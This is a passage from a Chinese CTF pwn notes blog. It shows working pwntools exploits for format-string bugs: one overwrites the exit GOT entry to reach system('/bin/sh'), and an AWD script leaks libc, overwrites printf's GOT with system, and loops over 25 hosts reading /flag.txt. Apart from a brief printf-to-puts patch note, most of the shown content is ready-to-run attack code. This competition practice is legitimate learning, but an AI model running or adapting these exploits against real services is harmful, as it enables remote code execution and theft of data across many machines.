class="string">&#x27;./fmt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">offset = <span class="number">8</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./fmt&#x27;</span>)</span><br><span class="line">exit_got = elf.got[<span class="string">&#x27;exit&#x27;</span>]</span><br><span class="line"><span class="comment">#exit_got = 0x404060</span></span><br><span class="line">system_binsh = <span class="number">0x4012D4</span></span><br><span class="line">payload = <span class="string">b&quot;%4820c%12$lln%108c%13$hhnaaaabaa&quot;</span> + p64(<span class="number">0x404060</span>) + p64(<span class="number">0x404062</span>)</span><br><span class="line"><span class="built_in">print</span> payload</span><br><span class="line">payload = fmtstr_payload(offset, &#123;exit_got : system_binsh&#125;,write_size=<span class="string">&quot;short&quot;</span>)</span><br><span class="line"><span class="built_in">print</span> payload</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="修复方法"><a href="#修复方法" class="headerlink" title="修复方法"></a>修复方法</h2><p>修改 printf –&gt;  puts </p>
<ol>
<li>找到 puts 函数的 plt 表地址 ：puts_plt</li>
<li>找到要修改的 格式化字符串漏洞的 printf 的地址，使用 call _printf 之后的地址：call_printf_next_addr</li>
<li>计算公式为 hex(0x10000000000000000 + puts_plt - call_printf_next_addr )</li>
<li>Patch   printf 十六进制值</li>
</ol>
<h1 id="awd-pwn"><a href="#awd-pwn" class="headerlink" title="awd-pwn"></a>awd-pwn</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exp</span>(<span class="params">ip,port</span>):</span></span><br><span class="line">    <span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line">    target = remote(ip,port)</span><br><span class="line">    <span class="built_in">print</span> target</span><br><span class="line">    <span class="comment">#target = remote(&#x27;10.100.128.3&#x27;,8888)</span></span><br><span class="line">    <span class="comment">#target=process(&#x27;./pwn&#x27;)</span></span><br><span class="line"></span><br><span class="line">    libc = ELF(<span class="string">&#x27;/lib32/libc.so.6&#x27;</span>)</span><br><span class="line">    elf =ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    got_puts = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">    <span class="comment">#print type(got_puts)</span></span><br><span class="line">    payload = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    payload += p32(got_puts)</span><br><span class="line">    payload += <span class="string">&#x27;%6$s&#x27;</span></span><br><span class="line">    <span class="comment">#print repr(payload)</span></span><br><span class="line">    target.recvuntil(<span class="string">&#x27;Do you know repeater?&#x27;</span>)</span><br><span class="line">    target.recvuntil(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">    target.sendline(payload)</span><br><span class="line">    puts_addr = target.recv()[<span class="number">4</span>:<span class="number">8</span>] <span class="comment"># the first 4 bytes for repter &#x27;%6$s&#x27;</span></span><br><span class="line">    log.success(<span class="built_in">hex</span>(u32(puts_addr)))</span><br><span class="line">    system_addr = u32(puts_addr) - (libc.symbols[<span class="string">&#x27;puts&#x27;</span>] - libc.symbols[<span class="string">&#x27;system&#x27;</span>])</span><br><span class="line">    <span class="comment">#log.success(hex(system_addr))</span></span><br><span class="line">    got_prt = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">    <span class="comment">#print hex(got_prt)</span></span><br><span class="line">    payload2 = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    payload2 = fmtstr_payload(<span class="number">6</span>,&#123;got_prt:system_addr&#125;)</span><br><span class="line">    <span class="comment">#target.recvuntil(&#x27;\n&#x27;)</span></span><br><span class="line">    target.sendline(payload2)</span><br><span class="line">    <span class="comment">#target.recvuntil(&#x27;\n&#x27;)</span></span><br><span class="line">    <span class="comment">#target.sendline(&#x27;/bin/sh\x00&#x27;)</span></span><br><span class="line">    <span class="comment">#target.interactive()</span></span><br><span class="line">    target.sendline(<span class="string">&#x27;cat /flag.txt&#x27;</span>)</span><br><span class="line">    flag = target.recvuntil(<span class="string">&quot;&#125;&quot;</span>)</span><br><span class="line">    target.close()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> flag:</span><br><span class="line">        f1=flag.find(<span class="string">&quot;flag&#123;&quot;</span>)</span><br><span class="line">        f2=flag.find(<span class="string">&quot;&#125;&quot;</span>,f1)</span><br><span class="line">        flag=flag[f1:f2+<span class="number">1</span>]</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> flag</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    port = <span class="number">8888</span></span><br><span class="line">    ip_head=<span class="string">&#x27;10.100.128.&#x27;</span></span><br><span class="line">    flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>,<span class="number">27</span>):</span><br><span class="line">        ip=ip_head+<span class="built_in">str</span>(i)</span><br><span class="line">        flag+=exp(ip=ip,port=port) + <span class="string">&#x27;\n&#x27;</span></span><br><span class="line">    <span class="built_in">print</span> flag</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        <div class="reward-container">
  <div>请博主喝咖啡</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    Donate
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="dong WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="dong Alipay">
        <p>Alipay</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/sec/" rel="tag"><i class="fa fa-tag"></i> sec</a>
              <a href="/tags/pwn/" rel="tag"><i class="fa fa-tag"></i> pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/13/gitee_blog%E6%B5%8B%E8%AF%95/" rel="prev" title="gitee_blog测试">
      <i class="fa fa-chevron-left"></i> gitee_blog测试
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/01/17/2021%E4%B8%80%E4%BA%9B%E7%BB%83%E4%B9%A0%E9%A2%98wp/" rel="next" title="2021一些练习题wp">
      2021一些练习题wp <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AE%80%E8%BF%B01"><span class="nav-number">1.</span> <span class="nav-text">简述1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B7%A5%E5%85%B7"><span class="nav-number">1.1.</span> <span class="nav-text">工具</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#checksec"><span class="nav-number">1.1.1.</span> <span class="nav-text">checksec</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%B0%E4%B8%80%E4%BA%9B%E5%91%BD%E4%BB%A4%EF%BC%9A"><span class="nav-number">1.2.</span> <span class="nav-text">记一些命令：</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level0-%E6%BA%A2%E5%87%BA%E7%9B%B4%E6%8E%A5%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0%E5%9C%B0%E5%9D%80"><span class="nav-number">2.</span> <span class="nav-text">level0  溢出直接执行函数地址</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level2-%E5%87%BD%E6%95%B0%E4%B8%8E%E5%8F%82%E6%95%B0%E4%B8%8D%E5%9C%A8%E4%B8%80%E8%B5%B7"><span class="nav-number">3.</span> <span class="nav-text">level2 函数与参数不在一起</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#x32"><span class="nav-number">3.1.</span> <span class="nav-text">x32</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#X64"><span class="nav-number">3.2.</span> <span class="nav-text">X64</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level3-%E6%97%A0system%E5%92%8C-bin-sh"><span class="nav-number">4.</span> <span class="nav-text">level3 无system和&#x2F;bin&#x2F;sh</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#x32-1"><span class="nav-number">4.1.</span> <span class="nav-text">x32</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#x64-NX-%E6%A0%88%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C"><span class="nav-number">4.2.</span> <span class="nav-text">x64  NX 栈不可执行</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#level1-shellcode"><span class="nav-number">5.</span> <span class="nav-text">level1 shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP"><span class="nav-number">5.0.1.</span> <span class="nav-text">EXP</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#fmt-x64-%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E"><span class="nav-number">6.</span> <span class="nav-text">fmt x64 格式化字符串漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%B3%95"><span class="nav-number">6.1.</span> <span class="nav-text">修复方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#awd-pwn"><span class="nav-number">7.</span> <span class="nav-text">awd-pwn</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">dong</p>
  <div class="site-description" itemprop="description">数据方面、网络安全方面的记事本</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">dong</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
